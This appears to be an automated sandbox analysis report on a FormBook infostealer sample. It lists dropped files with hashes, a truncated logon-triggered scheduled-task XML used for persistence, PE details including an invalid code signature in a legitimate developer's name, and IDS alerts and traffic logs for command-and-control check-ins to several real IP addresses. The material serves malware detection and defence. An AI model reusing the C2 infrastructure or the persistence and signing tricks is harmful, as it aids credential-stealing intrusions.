                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                  Malicious:false
                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:dropped
                                  Size (bytes):1594
                                  Entropy (8bit):5.089490276484582
                                  Encrypted:false
                                  SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL89X5h:cge7QYrFdOFzOzN33ODOiDdKrsuTQ9/v
                                  MD5:1391CC79937AD9227EA1212704BC3B5E
                                  SHA1:68C8809EF6299E88A3EC72FF2D724A7466793A8F
                                  SHA-256:B92F0D44198CE77279C264AF37127EA9AB6DAB448CD083217DC9DA64C481C64A
                                  SHA-512:89610C132ED8FF647378F4418E9D05AE1A4D00FB5D7AFCE57E1378BC8BCE8CC2BF47A585776CC63925930B85FC091D4A605E5B567FB7F9F0BE2EDB2354FAE22C
                                  Malicious:true
                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                  Process:C:\Users\user\AppData\Roaming\GDhinOc.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:dropped
                                  Size (bytes):1594
                                  Entropy (8bit):5.089490276484582
                                  Encrypted:false
                                  SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL89X5h:cge7QYrFdOFzOzN33ODOiDdKrsuTQ9/v
                                  MD5:1391CC79937AD9227EA1212704BC3B5E
                                  SHA1:68C8809EF6299E88A3EC72FF2D724A7466793A8F
                                  SHA-256:B92F0D44198CE77279C264AF37127EA9AB6DAB448CD083217DC9DA64C481C64A
                                  SHA-512:89610C132ED8FF647378F4418E9D05AE1A4D00FB5D7AFCE57E1378BC8BCE8CC2BF47A585776CC63925930B85FC091D4A605E5B567FB7F9F0BE2EDB2354FAE22C
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                  Process:C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):735752
                                  Entropy (8bit):7.977107140880606
                                  Encrypted:false
                                  SSDEEP:12288:S2rlAypLC3l8TrfKYZ0kopTFVoik+7dlH/C/o0p2f1i+FCbZ/RLrB4x42f2RLkR:PAyp+szzCpTFiikudlH/25p2fFM/RLrA
                                  MD5:3BFCA4BFD7CDB0F712E4D362E3B320FF
                                  SHA1:E5B837EE1DD3F31B9685216B9306AB4A7878421E
                                  SHA-256:5E8D9CEC59C261AD6E67689490CDD741D56C682CBE9A4C90668F77FFB6F5CB05
                                  SHA-512:D5881C10B56355BC73696D578B4A8C07FF135CA777D8B9DD5B575F9DAB51D3D931C8D41BA9763F78308E95EB177B949C4781B24F892800AAA0A09CF0FEEE9A77
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 53%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r6.f..............0.................. ... ....@.. .......................`............@.................................p...O.... ...................6...@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........B..|.......D...hq..............................................V.(......}......}....*...0...........{.....X....1.....*..|..........o....r...p.|..........o....(....*....0...........s....}.....(.....s....}.....s....}.........(....(....o.....+_.o...............(....(....o.....+..o...........{......s....o.....o....-....u........,...o......o....-....u........,...o.....*......_.*.........<.k........0..7........o ....+...(!.....{.....o......("...-...........o.....*.........
                                  Process:C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.977107140880606
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:nK1Y86mbzfbkwpB.exe
                                  File size:735'752 bytes
                                  MD5:3bfca4bfd7cdb0f712e4d362e3b320ff
                                  SHA1:e5b837ee1dd3f31b9685216b9306ab4a7878421e
                                  SHA256:5e8d9cec59c261ad6e67689490cdd741d56c682cbe9a4c90668f77ffb6f5cb05
                                  SHA512:d5881c10b56355bc73696d578b4a8c07ff135ca777d8b9dd5b575f9dab51d3d931c8d41ba9763f78308e95eb177b949c4781b24f892800aaa0a09cf0feee9a77
                                  SSDEEP:12288:S2rlAypLC3l8TrfKYZ0kopTFVoik+7dlH/C/o0p2f1i+FCbZ/RLrB4x42f2RLkR:PAyp+szzCpTFiikudlH/25p2fFM/RLrA
                                  TLSH:ABF423C08E6C9553CEBBAFB0529B550417B371771C20E6816CDA50DB3EE7BA40B69B0B
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r6.f..............0.................. ... ....@.. .......................`............@................................
                                  Icon Hash:1ec7e8e4c4ec5065
                                  Entrypoint:0x4b05c2
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66973672 [Wed Jul 17 03:11:46 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Signature Valid:false
                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                  Signature Validation Error:The digital signature of the object did not verify
                                  Error Number:-2146869232
                                  Not Before, Not After
                                  • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                  Subject Chain
                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                  Version:3
                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                  Serial:7C1118CBBADC95DA3752C46E47A27438
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                   Name | Virtual Address | Virtual Size | Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb0570 | 0x4f | .text
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x1994 | .rsrc
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb0400 | 0x3608 |
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc
                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                   .text | 0x2000 | 0xae5c8 | 0xae600 | 361b940093524755bfaa610d0fc4043b | False | 0.9704511088709677 | data | 7.983402866122095 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                   .rsrc | 0xb2000 | 0x1994 | 0x1a00 | a4ab314bb07883f412435346a1658c7c | False | 0.7723858173076923 | data | 7.075257385662227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   .reloc | 0xb4000 | 0xc | 0x200 | 7bfbb5c32e18cc0299b190e1e26d04c7 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                   RT_ICON | 0xb2100 | 0x12bf | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9020629297770368
                                   RT_GROUP_ICON | 0xb33d0 | 0x14 | data | | | 1.05
                                   RT_VERSION | 0xb33f4 | 0x3a0 | data | | | 0.41810344827586204
                                   RT_MANIFEST | 0xb37a4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                   DLL | Import
                                   mscoree.dll | _CorExeMain
                                   Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                   07/17/24-19:00:53.652505 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 63907 | 80 | 192.168.2.6 | 162.159.134.42
                                   07/17/24-18:59:57.073970 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   07/17/24-19:00:40.312082 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 63902 | 80 | 192.168.2.6 | 13.248.169.48
                                   07/17/24-19:00:26.031224 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 63898 | 80 | 192.168.2.6 | 172.96.191.69
                                   Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                   2024-07-17T19:00:35.621547+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63900 | 80 | 192.168.2.6 | 13.248.169.48
                                   2024-07-17T19:00:52.335086+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63905 | 80 | 192.168.2.6 | 162.159.134.42
                                   2024-07-17T19:00:47.382097+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63903 | 80 | 192.168.2.6 | 162.159.134.42
                                   2024-07-17T19:01:01.582855+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63908 | 80 | 192.168.2.6 | 85.159.66.93
                                   2024-07-17T19:00:38.233207+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63901 | 80 | 192.168.2.6 | 13.248.169.48
                                   2024-07-17T19:00:32.577007+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63899 | 80 | 192.168.2.6 | 13.248.169.48
                                   2024-07-17T19:00:19.259253+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63895 | 80 | 192.168.2.6 | 172.96.191.69
                                   2024-07-17T19:00:54.774305+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 63907 | 80 | 192.168.2.6 | 162.159.134.42
                                   2024-07-17T19:00:40.778213+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 63902 | 80 | 192.168.2.6 | 13.248.169.48
                                   2024-07-17T18:59:57.833169+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   2024-07-17T19:01:04.183883+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63909 | 80 | 192.168.2.6 | 85.159.66.93
                                   2024-07-17T19:00:21.843720+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63896 | 80 | 192.168.2.6 | 172.96.191.69
                                   2024-07-17T19:00:49.815005+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63904 | 80 | 192.168.2.6 | 162.159.134.42
                                   2024-07-17T19:00:54.774305+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 63907 | 80 | 192.168.2.6 | 162.159.134.42
                                   2024-07-17T19:00:40.778213+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 63902 | 80 | 192.168.2.6 | 13.248.169.48
                                   2024-07-17T19:00:26.999460+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 63898 | 80 | 192.168.2.6 | 172.96.191.69
                                   2024-07-17T18:59:57.833169+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   2024-07-17T19:00:24.415757+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 63897 | 80 | 192.168.2.6 | 172.96.191.69
                                   2024-07-17T19:00:26.999460+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 63898 | 80 | 192.168.2.6 | 172.96.191.69
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Jul 17, 2024 18:59:57.052675009 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.057775974 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.057858944 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.073970079 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.079067945 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.832782030 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833019018 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833050966 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833086014 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833121061 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833153963 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833168983 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.833188057 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833224058 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833235979 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.833235979 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.833262920 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833281994 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.833292007 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 18:59:57.833316088 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.833338022 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.848619938 CEST | 63893 | 80 | 192.168.2.6 | 185.179.189.181
                                   Jul 17, 2024 18:59:57.854101896 CEST | 80 | 63893 | 185.179.189.181 | 192.168.2.6
                                   Jul 17, 2024 19:00:18.291317940 CEST | 63895 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:18.301954985 CEST | 80 | 63895 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:18.302052021 CEST | 63895 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:18.322715044 CEST | 63895 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:18.329575062 CEST | 80 | 63895 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:19.258730888 CEST | 80 | 63895 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:19.259077072 CEST | 80 | 63895 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:19.259253025 CEST | 63895 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:19.835130930 CEST | 63895 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:20.867496967 CEST | 63896 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:20.874772072 CEST | 80 | 63896 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:20.874881983 CEST | 63896 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:20.893569946 CEST | 63896 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:20.901310921 CEST | 80 | 63896 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:21.843307018 CEST | 80 | 63896 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:21.843571901 CEST | 80 | 63896 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:21.843719959 CEST | 63896 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:22.397708893 CEST | 63896 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:23.431900978 CEST | 63897 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:23.440886974 CEST | 80 | 63897 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:23.440996885 CEST | 63897 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:23.461924076 CEST | 63897 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:23.467005014 CEST | 80 | 63897 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:23.467091084 CEST | 80 | 63897 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:24.415227890 CEST | 80 | 63897 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:24.415666103 CEST | 80 | 63897 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:24.415756941 CEST | 63897 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:24.975655079 CEST | 63897 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:26.008438110 CEST | 63898 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:26.013550997 CEST | 80 | 63898 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:26.013648987 CEST | 63898 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:26.031224012 CEST | 63898 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:26.036127090 CEST | 80 | 63898 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:26.999006033 CEST | 80 | 63898 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:26.999377012 CEST | 80 | 63898 | 172.96.191.69 | 192.168.2.6
                                   Jul 17, 2024 19:00:26.999459982 CEST | 63898 | 80 | 192.168.2.6 | 172.96.191.69
                                   Jul 17, 2024 19:00:27.007105112 CEST | 63898 | 80 | 192.168.2.6 | 172.96.191.69
